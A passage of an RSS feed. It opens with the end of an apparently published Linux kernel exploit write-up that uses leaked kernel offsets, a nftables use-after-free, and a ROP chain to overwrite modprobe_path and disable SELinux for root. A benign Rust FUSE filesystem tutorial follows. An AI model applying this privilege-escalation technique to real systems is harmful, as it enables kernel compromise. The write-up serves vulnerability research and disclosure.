			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Inside this &lt;code&gt;struct ipc_ids&lt;/code&gt;, there is a field named &lt;code&gt;xa_head&lt;/code&gt;, which is the root of a radix tree. Before digging into radix trees, we can compute the address of our first value to leak: address of &lt;code&gt;init_ipc_ns&lt;/code&gt; + 224 (size of the first &lt;code&gt;struct ipc_ids&lt;/code&gt;, the one for semaphores) + 56 (offset of &lt;code&gt;xa_head&lt;/code&gt; in the struct) = &lt;strong&gt;&lt;code&gt;init_ipc_ns&lt;/code&gt; + 0x118&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;From &lt;a href=&quot;https://en.wikipedia.org/wiki/Radix_tree&quot;&gt;Wikipedia&lt;/a&gt;:&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;In computer science, a radix tree (also radix trie or compact prefix tree or compressed trie) is a data structure that represents a space-optimized trie (prefix tree) in which each node that is the only child is merged with its parent. The number of children of every internal node is at most the radix r of the radix tree, where r = 2&lt;sup&gt;x&lt;/sup&gt; for some integer x ≥ 1. Unlike regular trees, edges can be labeled with sequences of elements as well as single elements. This makes radix trees much more efficient for small sets (especially if the strings are long) and for sets of strings that share long prefixes.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;In the Linux kernel, it is represented by &lt;code&gt;struct xa_node&lt;/code&gt; in &lt;code&gt;xarray.h&lt;/code&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/*
 * @count is the count of every non-NULL element in the -&amp;gt;slots array
 * whether that is a value entry, a retry entry, a user pointer,
 * a sibling entry or a pointer to the next level of the tree.
 * @nr_values is the count of every element in -&amp;gt;slots which is
 * either a value entry or a sibling of a value entry.
 */
struct xa_node {
	unsigned char	shift;		/* Bits remaining in each slot */
	unsigned char	offset;		/* Slot offset in parent */
	unsigned char	count;		/* Total entry count */
	unsigned char	nr_values;	/* Value entry count */
	struct xa_node __rcu *parent;	/* NULL at top of tree */
	struct xarray	*array;		/* The array we belong to */
	union {
		struct list_head private_list;	/* For tree user */
		struct rcu_head	rcu_head;	/* Used when freeing node */
	};
	void __rcu	*slots[XA_CHUNK_SIZE];
	union {
		unsigned long	tags[XA_MAX_MARKS][XA_MARK_LONGS];
		unsigned long	marks[XA_MAX_MARKS][XA_MARK_LONGS];
	};
};&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
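&lt;p&gt;The &lt;code&gt;init_ipc_ns&lt;/code&gt; + 0x118 offset derived earlier from the &lt;code&gt;pahole&lt;/code&gt; output can be re-checked with a few lines of shell arithmetic. The two constants are the values quoted in this article for this specific kernel build; the function name &lt;code&gt;xa_head_offset&lt;/code&gt; is only illustrative, and other builds may have different sizes.&lt;/p&gt;

```shell
#!/bin/sh
# Values taken from the pahole output for this kernel build.
IPC_IDS_SIZE=224    # sizeof(struct ipc_ids)
XA_HEAD_OFF=56      # offset of xa_head inside struct ipc_ids

# xa_head_offset INDEX: offset of ids[INDEX].xa_head from the start of
# struct ipc_namespace (0 = semaphores, 1 = message queues, 2 = shared memory).
xa_head_offset() {
    printf '0x%x\n' $(( $1 * IPC_IDS_SIZE + XA_HEAD_OFF ))
}

echo "semaphores:     $(xa_head_offset 0)"
echo "message queues: $(xa_head_offset 1)"
echo "shared memory:  $(xa_head_offset 2)"
```

&lt;p&gt;Index 1 selects the message queue entry, which is the one followed in the rest of this section.&lt;/p&gt;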
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Here we are interested in the message queue radix tree, whose &lt;code&gt;slots&lt;/code&gt; array contains, at the leaf level, pointers to &lt;code&gt;struct msg_queue&lt;/code&gt;. Since this exploit is a PoC, we assume that no message queue exists before it runs. Therefore, the &lt;code&gt;msg_queue&lt;/code&gt; created by our exploit takes the first slot.&lt;/p&gt;&lt;p&gt;Using &lt;code&gt;pahole&lt;/code&gt; again, we can find the second address to leak: first_leak + 0x28 (offset of &lt;code&gt;slots[0]&lt;/code&gt;).&lt;/p&gt;&lt;p&gt;This will give us a pointer to a &lt;code&gt;struct msg_queue&lt;/code&gt;:&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/* one msq_queue structure for each present queue on the system */
struct msg_queue {
	struct kern_ipc_perm q_perm;
	time64_t q_stime;		/* last msgsnd time */
	time64_t q_rtime;		/* last msgrcv time */
	time64_t q_ctime;		/* last change time */
	unsigned long q_cbytes;		/* current number of bytes on queue */
	unsigned long q_qnum;		/* number of messages in queue */
	unsigned long q_qbytes;		/* max number of bytes on queue */
	struct pid *q_lspid;		/* pid of last msgsnd */
	struct pid *q_lrpid;		/* last receive pid */

	struct list_head q_messages;
	struct list_head q_receivers;
	struct list_head q_senders;
} __randomize_layout;&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;And here it is: &lt;code&gt;q_messages&lt;/code&gt;, the doubly linked list containing pointers to our &lt;code&gt;msg_msg&lt;/code&gt; objects. We just need to find its offset using &lt;code&gt;pahole&lt;/code&gt;: &lt;code&gt;second_leak + 0xc0&lt;/code&gt; (offset of the &lt;code&gt;q_messages&lt;/code&gt; list head). With only three leaks, we obtain an address inside the &lt;code&gt;msg_msg-2k&lt;/code&gt; slab (assuming we size the first &lt;code&gt;msg_msg&lt;/code&gt; so that it lands in this cache).&lt;/p&gt;&lt;h3&gt;Controlling RIP&lt;/h3&gt;&lt;p&gt;For this part, we used the same approach as in &lt;a href=&quot;https://kaligulaarmblessed.github.io/post/nftables-adventures-2/&quot;&gt;this write-up&lt;/a&gt;. The idea is the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Find a way to trigger &lt;code&gt;nft_chain_validate&lt;/code&gt; on the UAF chain.&lt;/li&gt;&lt;li&gt;This function goes through each expression in each rule and calls &lt;code&gt;expr-&amp;gt;ops-&amp;gt;validate&lt;/code&gt;, which is a function pointer inside &lt;code&gt;struct nft_expr_ops&lt;/code&gt;.&lt;/li&gt;&lt;/ul&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;pre&gt;				&lt;code class=&quot;language-c&quot;&gt;/** nft_chain_validate - loop detection and hook validation
 *
 * @ctx: context containing call depth and base chain
 * @chain: chain to validate
 *
 * Walk through the rules of the given chain and chase all jumps/gotos
 * and set lookups until either the jump limit is hit or all reachable
 * chains have been validated.
 */
int nft_chain_validate(const struct nft_ctx *ctx, struct nft_chain *chain)
{
	struct nft_expr *expr, *last;
	struct nft_rule *rule;
	int err;

	BUILD_BUG_ON(NFT_JUMP_STACK_SIZE &amp;gt; 255);
	if (ctx-&amp;gt;level == NFT_JUMP_STACK_SIZE)
		return -EMLINK;

	if (ctx-&amp;gt;level &amp;gt; 0) {
		/* jumps to base chains are not allowed. */
		if (nft_is_base_chain(chain))
			return -ELOOP;

		if (nft_chain_vstate_valid(ctx, chain))
			return 0;
	}

	list_for_each_entry(rule, &amp;amp;chain-&amp;gt;rules, list) {
		if (fatal_signal_pending(current))
			return -EINTR;

		if (!nft_is_active_next(ctx-&amp;gt;net, rule))
			continue;

		nft_rule_for_each_expr(expr, last, rule) {
			if (!expr-&amp;gt;ops-&amp;gt;validate)
				continue;

			/* This may call nft_chain_validate() recursively,
			 * callers that do so must increment ctx-&amp;gt;level.
			 */
			err = expr-&amp;gt;ops-&amp;gt;validate(ctx, expr);
			if (err &amp;lt; 0)
				return err;
		}

		cond_resched();
	}

	nft_chain_vstate_update(ctx, chain);
	return 0;
}&lt;/code&gt;
			&lt;/pre&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;We use the same technique as before: use the UAF to place &lt;code&gt;table-&amp;gt;name&lt;/code&gt; at the old location of &lt;code&gt;nft_chain&lt;/code&gt;, then make the &lt;code&gt;rules-&amp;gt;next&lt;/code&gt; offset point to our &lt;code&gt;msg_msg-2k&lt;/code&gt; leak + 0x30 (this is where we control the data, since &lt;code&gt;msg_msg&lt;/code&gt; has metadata at the beginning of the structure). Then we replace our old &lt;code&gt;msg_msg&lt;/code&gt; with one containing all fake pointers at precise offsets to simulate the different structures, until we can start our ROP chain at the old &lt;code&gt;validate&lt;/code&gt; field. We are lucky because our first gadget is called with:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;code-line language-C&quot;&gt;expr-&amp;gt;ops-&amp;gt;validate(ctx, expr)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Here, &lt;code&gt;expr&lt;/code&gt; is a pointer to our fake &lt;code&gt;nft_expr&lt;/code&gt;, which we control. This makes it easier to stack pivot into &lt;code&gt;msg_msg-2k&lt;/code&gt;, since &lt;code&gt;RSI&lt;/code&gt; already points to an address in that region.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;As gadgets change between kernel builds, we will not go into detail on how to craft a ROP chain. We will just explain what we did and leave this exercise to the reader.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;In our ROP chain, after stack pivoting into &lt;code&gt;msg_msg-2k&lt;/code&gt;, we decided to modify &lt;code&gt;modprobe_path&lt;/code&gt; in order to obtain root privileges (see &lt;a href=&quot;https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch&quot;&gt;this article&lt;/a&gt;). After modifying it, we also had to disable &lt;code&gt;SELinux&lt;/code&gt;, as it would block the kernel from executing a file in &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/home/user&lt;/code&gt; as &lt;code&gt;modprobe_path&lt;/code&gt;. 
To do so, we set the &lt;code&gt;enforcing&lt;/code&gt; field of the global &lt;code&gt;selinux_state&lt;/code&gt; structure to 0. After that, we did not want to return to userland because we had completely corrupted the kernel stack, so we put the hijacked task to sleep in kernel context using &lt;code&gt;msleep&lt;/code&gt;. This still allows us to trigger the &lt;code&gt;modprobe_path&lt;/code&gt; execution from another process.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2026/04/kernel_sleep.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;After setting up all these structures, there is one last thing to do: trigger the call to &lt;code&gt;nft_chain_validate&lt;/code&gt;. To do so, you can create a base chain and add a rule that uses the map with the UAF as the filter.&lt;/p&gt;&lt;p&gt;This will call &lt;code&gt;nft_chain_validate&lt;/code&gt;, traverse all the fake structures, and call the fake &lt;code&gt;validate&lt;/code&gt; pointer (now your ROP chain), giving you an LPE!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;&lt;b&gt;Alexis &amp;amp; Lyes&lt;/b&gt;&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;About Us&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Founded in 2021 and headquartered in Paris, &lt;strong&gt;FuzzingLabs&lt;/strong&gt; is a cybersecurity startup specializing in &lt;strong&gt;vulnerability research, fuzzing, and blockchain security&lt;/strong&gt;. We combine cutting-edge research with hands-on expertise to secure some of the most critical components in the blockchain ecosystem.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://fuzzinglabs.com/contact&quot;&gt;Contact us&lt;/a&gt; for an audit or long-term partnership!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Building a tiny FUSE filesystem</title>
<link>https://www.shayon.dev/post/2026/161/building-a-tiny-fuse-filesystem/</link>
<enclosure type="image/jpeg" length="0" url="https://www.shayon.dev/tiny-filesystem.jpg"></enclosure>
<guid isPermaLink="false">SCp0SPp3Cxq0gngoXG8ppaz3x1Cd0i0a5W4j7A==</guid>
<pubDate>Tue, 23 Jun 2026 13:56:14 +0000</pubDate>
<description>Building a small filesystem in Rust with metadata in JSON and file contents in plain local files, using FUSE to explore inodes, caching, and what it means for a write to become durable.</description>
<content:encoded>&lt;p&gt;Lately I have been working around sandboxing, storage, and networking, and a lot of that work keeps coming back to files, which makes sense since Unix has organized itself around &lt;a href=&quot;https://en.wikipedia.org/wiki/Everything_is_a_file&quot;&gt;everything is a file&lt;/a&gt; for over fifty years. Your terminal and random number generator are device files you can open and read (&lt;code&gt;/dev/tty&lt;/code&gt;, &lt;code&gt;/dev/urandom&lt;/code&gt;), and even network sockets, which are created with their own system call rather than opened by path, are read and written through the same interface afterwards.&lt;/p&gt;&lt;p&gt;For this post, I built a small filesystem with a real backing store, enough metadata to behave like a filesystem, and a few deliberate omissions so the code is still readable.&lt;/p&gt;&lt;p&gt;&lt;code&gt;magicfs&lt;/code&gt; mounts at &lt;code&gt;/magic&lt;/code&gt;, but it keeps its own local backing store next to it, with names and inode numbers in &lt;code&gt;metadata.json&lt;/code&gt;, while file contents live as plain local files under &lt;code&gt;blobs/&lt;/code&gt;. 
Calling that directory a blob store is a little grandiose, because the blobs are just files with allocated names like &lt;code&gt;blob-000000000001&lt;/code&gt;, but keeping metadata separate from file contents lets the example cover name lookup, inode stability, write ordering, kernel caching, and what &lt;code&gt;fsync()&lt;/code&gt; is asking the filesystem to do.&lt;/p&gt;&lt;p&gt;The full sample code is at &lt;a href=&quot;https://github.com/shayonj/magicfs&quot;&gt;github.com/shayonj/magicfs&lt;/a&gt;, and if you have Docker, you can run the filesystem with FUSE enabled.&lt;/p&gt;&lt;h2&gt;Try it first&lt;/h2&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;docker run -it --rm --device /dev/fuse --cap-add SYS_ADMIN shayonj/magicfs&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ ls /magic
hello.txt  notes.txt

$ cat /magic/hello.txt
Hello from a tiny FUSE filesystem.

$ echo &amp;quot;remember the milk&amp;quot; &amp;gt; /magic/notes.txt
$ cat /magic/notes.txt
remember the milk&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Inside that shell, the mount point is the interface applications use, while the store directory is private state owned by the filesystem process, so the shell sees an ordinary directory even though the data behind it is a metadata file plus a couple of local blobs.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ find /tmp/magicfs-store -type f
/tmp/magicfs-store/metadata.json
/tmp/magicfs-store/blobs/blob-000000000001
/tmp/magicfs-store/blobs/blob-000000000002&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the store directory, the metadata file stands in for a tiny inode table and a tiny directory tree, recording the name, inode number, size, mode bits, and blob IDs for each file.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;next_inode&amp;quot;: 4,
  &amp;quot;entries&amp;quot;: {
    &amp;quot;hello.txt&amp;quot;: {
      &amp;quot;ino&amp;quot;: 2,
      &amp;quot;mode&amp;quot;: 420,
      &amp;quot;size&amp;quot;: 36,
      &amp;quot;blobs&amp;quot;: [
        {
          &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000001&amp;quot;,
          &amp;quot;offset&amp;quot;: 0,
          &amp;quot;len&amp;quot;: 36
        }
      ]
    },
    &amp;quot;notes.txt&amp;quot;: {
      &amp;quot;ino&amp;quot;: 3,
      &amp;quot;mode&amp;quot;: 420,
      &amp;quot;size&amp;quot;: 18,
      &amp;quot;blobs&amp;quot;: [
        {
          &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000002&amp;quot;,
          &amp;quot;offset&amp;quot;: 0,
          &amp;quot;len&amp;quot;: 18
        }
      ]
    }
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The path &lt;code&gt;notes.txt&lt;/code&gt; is not where the bytes live, it is the name that gets you to inode 3, and the metadata for inode 3 points at a blob file under &lt;code&gt;blobs/&lt;/code&gt;, so renaming &lt;code&gt;notes.txt&lt;/code&gt; changes the directory metadata, while rewriting it creates a new blob and updates the metadata pointer.&lt;/p&gt;&lt;h2&gt;Filesystems as a request loop&lt;/h2&gt;&lt;p&gt;When you run &lt;code&gt;cat /magic/hello.txt&lt;/code&gt;, &lt;code&gt;cat&lt;/code&gt; does not know that JSON metadata and blob files are involved, because all it does is call &lt;code&gt;open()&lt;/code&gt; and &lt;code&gt;read()&lt;/code&gt;, after which the kernel resolves the path through the &lt;a href=&quot;https://www.kernel.org/doc/html/latest/filesystems/vfs.html&quot;&gt;VFS&lt;/a&gt;, and the operation eventually lands on the filesystem mounted at &lt;code&gt;/magic&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;With FUSE, the code that answers those filesystem requests runs in userspace, where the kernel driver sends request messages over &lt;code&gt;/dev/fuse&lt;/code&gt;, the userspace process replies, and the application that made the system call keeps waiting until the kernel has an answer, while the &lt;a href=&quot;https://www.kernel.org/doc/html/latest/filesystems/fuse.html&quot;&gt;kernel FUSE documentation&lt;/a&gt; covers the protocol, and the &lt;a href=&quot;https://docs.rs/fuser&quot;&gt;&lt;code&gt;fuser&lt;/code&gt;&lt;/a&gt; crate exposes the same operations as Rust trait methods.&lt;/p&gt;&lt;p&gt;The path for a read looks roughly like this:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-mermaid&quot;&gt;flowchart LR
    A[&amp;quot;cat /magic/hello.txt&amp;quot;] --&amp;gt; B[&amp;quot;Linux VFS&amp;quot;]
    B --&amp;gt; C[&amp;quot;FUSE kernel driver&amp;quot;]
    C --&amp;gt; D[&amp;quot;magicfs userspace process&amp;quot;]
    D --&amp;gt; E[&amp;quot;metadata.json + local blobs&amp;quot;]
    E --&amp;gt; D
    D --&amp;gt; C
    C --&amp;gt; B
    B --&amp;gt; A&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the request log, &lt;code&gt;LOOKUP&lt;/code&gt; asks whether a name exists in a directory and which inode it maps to, &lt;code&gt;GETATTR&lt;/code&gt; asks for the metadata associated with an inode, &lt;code&gt;READ&lt;/code&gt; asks for bytes at an offset, and &lt;code&gt;WRITE&lt;/code&gt; sends bytes at an offset, while later in the lifetime of an open file, &lt;code&gt;FLUSH&lt;/code&gt;, &lt;code&gt;FSYNC&lt;/code&gt;, and &lt;code&gt;RELEASE&lt;/code&gt; show up and make the write path less like a simple callback that copies bytes.&lt;/p&gt;&lt;p&gt;Here is the log from writing &lt;code&gt;notes.txt&lt;/code&gt;, trimmed to the requests involved in opening, truncating, writing, flushing, and releasing the file:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;[magicfs] READDIR ino=1
[magicfs] LOOKUP notes.txt -&amp;gt; ino=3
[magicfs] OPEN notes.txt ino=3 flags=0x8001
[magicfs] SETATTR ino=3 size=0 staged=true
[magicfs] WRITE notes.txt ino=3 offset=0 len=18 staged=true
[magicfs] FLUSH notes.txt ino=3
[magicfs] COMMIT notes.txt ino=3 size=18 blobs=1
[magicfs] COMMIT metadata entries=2
[magicfs] RELEASE notes.txt ino=3 flags=0x8001 flush=true&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In this log, &lt;code&gt;ls&lt;/code&gt; triggers &lt;code&gt;READDIR&lt;/code&gt;, while a direct &lt;code&gt;cat /magic/hello.txt&lt;/code&gt; can walk the path without listing the directory first. Shell redirection with &lt;code&gt;&amp;gt;&lt;/code&gt; opens the file for writing and truncation, so the kernel sends a size change before it sends the bytes, and the &lt;code&gt;WRITE&lt;/code&gt; handler only stages the new contents in memory, while the backing store does not change until the file is flushed or synced.&lt;/p&gt;&lt;h2&gt;Metadata and names&lt;/h2&gt;&lt;p&gt;A filesystem usually has to answer a question about a name before it can answer anything about bytes, namely whether this name exists in this directory, and if it does, which file it refers to.&lt;/p&gt;&lt;p&gt;Linux mostly stops caring about filenames once path lookup is done, because internally it refers to files by inode number, and on a disk filesystem, an inode is a record with metadata and pointers to data blocks, while a directory entry maps a name to an inode, which is why a rename can change a path without moving file data, and also why hard links can make the same inode appear under more than one name.&lt;/p&gt;&lt;p&gt;&lt;code&gt;magicfs&lt;/code&gt; keeps the directory entry and inode metadata in &lt;code&gt;metadata.json&lt;/code&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;notes.txt&amp;quot;: {
  &amp;quot;ino&amp;quot;: 3,
  &amp;quot;mode&amp;quot;: 420,
  &amp;quot;size&amp;quot;: 18,
  &amp;quot;blobs&amp;quot;: [
    {
      &amp;quot;blob&amp;quot;: &amp;quot;blob-000000000002&amp;quot;,
      &amp;quot;offset&amp;quot;: 0,
      &amp;quot;len&amp;quot;: 18
    }
  ]
}&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The &lt;code&gt;LOOKUP notes.txt&lt;/code&gt; handler reads that map and returns inode 3, while the &lt;code&gt;GETATTR&lt;/code&gt; handler turns the entry into a &lt;code&gt;FileAttr&lt;/code&gt;, which is what makes &lt;code&gt;stat&lt;/code&gt; and &lt;code&gt;ls -l&lt;/code&gt; work, and the root directory uses inode 1, which is the conventional root inode for FUSE filesystems.&lt;/p&gt;&lt;p&gt;The ordering problem shows up before the read and write handlers do anything with file contents, because if a new blob reaches the backing store but &lt;code&gt;metadata.json&lt;/code&gt; still points at the old blob, readers keep seeing the old file, while if &lt;code&gt;metadata.json&lt;/code&gt; points at a blob that never made it to disk, readers see a broken file. &lt;code&gt;magicfs&lt;/code&gt; handles the simple case by writing the blob first, then replacing metadata, and the metadata replacement follows the usual local-filesystem pattern where the code writes a temporary file, syncs it, renames it over &lt;code&gt;metadata.json&lt;/code&gt;, and then syncs the containing directory.&lt;/p&gt;&lt;p&gt;The temp-file-and-rename pattern avoids half-written JSON, but it is not a journal, and without a recovery pass or a transaction log, the filesystem cannot determine after a crash whether every in-flight metadata update had committed.&lt;/p&gt;&lt;h2&gt;File contents as local blobs&lt;/h2&gt;&lt;p&gt;For the data path, &lt;code&gt;magicfs&lt;/code&gt; stores each committed file version as one immutable blob with an allocated ID, while a more complete filesystem would split larger files into chunks and let metadata point at a list of chunks, but one blob per file keeps the code short.&lt;/p&gt;&lt;p&gt;For reads, metadata comes first, so given inode 3, the filesystem finds the entry for &lt;code&gt;notes.txt&lt;/code&gt;, reads the blob ID from that entry, opens the corresponding file under &lt;code&gt;blobs/&lt;/code&gt;, and 
returns the byte range the kernel requested.&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;inode 3
  -&amp;gt; metadata entry for notes.txt
  -&amp;gt; blob ID blob-000000000002
  -&amp;gt; blobs/blob-000000000002
  -&amp;gt; bytes returned to READ&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For writes, the data moves in the other direction, but &lt;code&gt;magicfs&lt;/code&gt; does not mutate the blob in place, because when the kernel sends &lt;code&gt;WRITE&lt;/code&gt;, the filesystem stages the new file contents in memory, and later, when &lt;code&gt;FLUSH&lt;/code&gt; or &lt;code&gt;FSYNC&lt;/code&gt; arrives, it writes a new blob and updates metadata to point at it.&lt;/p&gt;&lt;p&gt;The example ends up with a small copy-on-write data path, although rewriting one byte of a large file should not require rewriting the whole file, so a more complete implementation would chunk the file, track dirty chunks, write only the changed chunks, and then commit a metadata update that points at the new chunk list, while &lt;code&gt;magicfs&lt;/code&gt; skips that complexity by assuming the files are small enough to rewrite as a unit.&lt;/p&gt;&lt;h2&gt;Write is not sync&lt;/h2&gt;&lt;p&gt;A shell command like this looks simpler than the filesystem work behind it:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-console&quot;&gt;$ echo &amp;quot;remember the milk&amp;quot; &amp;gt; /magic/notes.txt&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Inside &lt;code&gt;magicfs&lt;/code&gt;, the work is closer to this:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-text&quot;&gt;OPEN notes.txt for writing
SETATTR notes.txt size=0
WRITE bytes at offset 0
FLUSH because a file descriptor is closing
write content blob
replace metadata.json
RELEASE the open file&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;On a normal Linux filesystem, &lt;code&gt;write(2)&lt;/code&gt; usually means the kernel accepted the bytes into memory, not that the bytes necessarily reached stable storage. &lt;a href=&quot;https://man7.org/linux/man-pages/man2/fsync.2.html&quot;&gt;&lt;code&gt;fsync(2)&lt;/code&gt;&lt;/a&gt; is the call an application uses when it wants the file data, along with the metadata needed to retrieve that data, flushed to the storage device, while &lt;code&gt;fdatasync(2)&lt;/code&gt; is similar but can skip metadata that is not needed for a later read.&lt;/p&gt;&lt;p&gt;FUSE also calls the filesystem when a file descriptor closes, because &lt;code&gt;flush&lt;/code&gt; is called on close, and duplicated file descriptors mean one open file can have more than one flush. A filesystem can use &lt;code&gt;flush&lt;/code&gt; to report delayed write errors, but &lt;code&gt;flush&lt;/code&gt; does not mean the same thing as &lt;code&gt;fsync&lt;/code&gt;, and &lt;code&gt;release&lt;/code&gt; happens later still, when the kernel is done with the open file handle.&lt;/p&gt;&lt;p&gt;For the shell demo, &lt;code&gt;magicfs&lt;/code&gt; commits staged bytes on both &lt;code&gt;FLUSH&lt;/code&gt; and &lt;code&gt;FSYNC&lt;/code&gt;, which makes &lt;code&gt;echo hello &amp;gt; /magic/notes.txt&lt;/code&gt; behave the way a person expects, while the code still treats &lt;code&gt;fsync&lt;/code&gt; as the explicit request for durable file data and metadata. 
A database that calls &lt;code&gt;fsync&lt;/code&gt; is asking a more specific question than a shell that happened to close a redirected file, and if the backing blob write fails after &lt;code&gt;WRITE&lt;/code&gt; already returned success, the filesystem still has to decide where that error can be reported, either through a later &lt;code&gt;fsync&lt;/code&gt; or through a close-time error from &lt;code&gt;flush&lt;/code&gt;, although plenty of programs are not careful about checking close errors.&lt;/p&gt;&lt;p&gt;For metadata, replacing a file with &lt;code&gt;rename&lt;/code&gt; is atomic for readers, but atomic replacement is not the same thing as durability after power loss, so if you care that the new &lt;code&gt;metadata.json&lt;/code&gt; survives a crash, you need to sync the new file contents and the directory entry that points at it, which &lt;code&gt;magicfs&lt;/code&gt; handles for its local store by syncing the temporary metadata file before rename, then syncing the store directory after rename.&lt;/p&gt;&lt;p&gt;In code, those rules show up in the order of blob writes, metadata replacement, &lt;code&gt;flush&lt;/code&gt;, and &lt;code&gt;fsync&lt;/code&gt;, because the filesystem has to decide which bytes exist, which names point at them, and what an application is allowed to assume after a successful sync.&lt;/p&gt;&lt;h2&gt;Caching and stale metadata&lt;/h2&gt;&lt;p&gt;FUSE replies can include time-to-live values for names and attributes, and until those TTLs expire, the kernel can answer repeated lookups and &lt;code&gt;getattr&lt;/code&gt; calls without asking the userspace process again, which matters because crossing from the kernel into a userspace filesystem on every &lt;code&gt;stat&lt;/code&gt; would be expensive.&lt;/p&gt;&lt;p&gt;The same TTL also affects correctness, because &lt;code&gt;magicfs&lt;/code&gt; uses a one second TTL, which is fine for a single-process demo, but if another process or another machine can update the same 
backing store, a reader may see an old file size or an old blob ID until the cache expires unless the filesystem actively invalidates the kernel’s cached state.&lt;/p&gt;&lt;p&gt;For file contents, &lt;code&gt;magicfs&lt;/code&gt; opens files with FUSE direct I/O so reads come back to the userspace filesystem instead of being served from the page cache, which keeps the example easier to reason about but gives up caching and read-ahead that a real filesystem would probably want, and the cache policy matters because it changes which file size, inode attributes, and file contents callers are able to observe.&lt;/p&gt;&lt;h2&gt;Shortcomings I kept&lt;/h2&gt;&lt;p&gt;The implementation only supports one directory, and each file is stored as one local blob, so rewriting a byte rewrites the whole file, with no journal, recovery scan, or cleanup for orphaned blobs left behind by rewrites or unlinks, and it also does not implement locking, &lt;code&gt;mmap&lt;/code&gt;, extended attributes, a real permission model, sparse files, hard links, symlinks, or multi-client cache invalidation.&lt;/p&gt;&lt;p&gt;The filesystem also does not model the problems that show up when the backing layer is remote, since network failures, remote consistency rules, retries, and authentication all change when reads can succeed, when writes can be retried, and what &lt;code&gt;fsync&lt;/code&gt; can honestly report, while this example stays on local disk so the post can focus on filesystem calls.&lt;/p&gt;&lt;p&gt;A journal or transaction log would let recovery decide whether a metadata update committed, chunking would avoid rewriting whole files, a garbage collector would find blobs no metadata entry can reach, and better cache invalidation would keep multiple readers from seeing stale metadata for too long.&lt;/p&gt;&lt;p&gt;With FUSE, Linux asks the filesystem a fixed collection of questions, and the implementation can answer from whatever backing store it owns, which means the implementation 
still has to define &lt;code&gt;lookup&lt;/code&gt;, &lt;code&gt;write&lt;/code&gt;, &lt;code&gt;flush&lt;/code&gt;, &lt;code&gt;fsync&lt;/code&gt;, and &lt;code&gt;rename&lt;/code&gt; when metadata and file contents are stored somewhere else.&lt;/p&gt;&lt;p&gt;I am working on these filesystem, sandboxing, and storage problems at Tines, along with plenty of adjacent systems work that gets deeper than a blog post can. If that sounds interesting, &lt;a href=&quot;https://www.tines.com/careers/jobs/6014045004/&quot;&gt;we are hiring&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Preview: Slice Up Bare-Metal with Slicer</title>
<link>https://blog.alexellis.io/slicer-bare-metal-preview/</link>
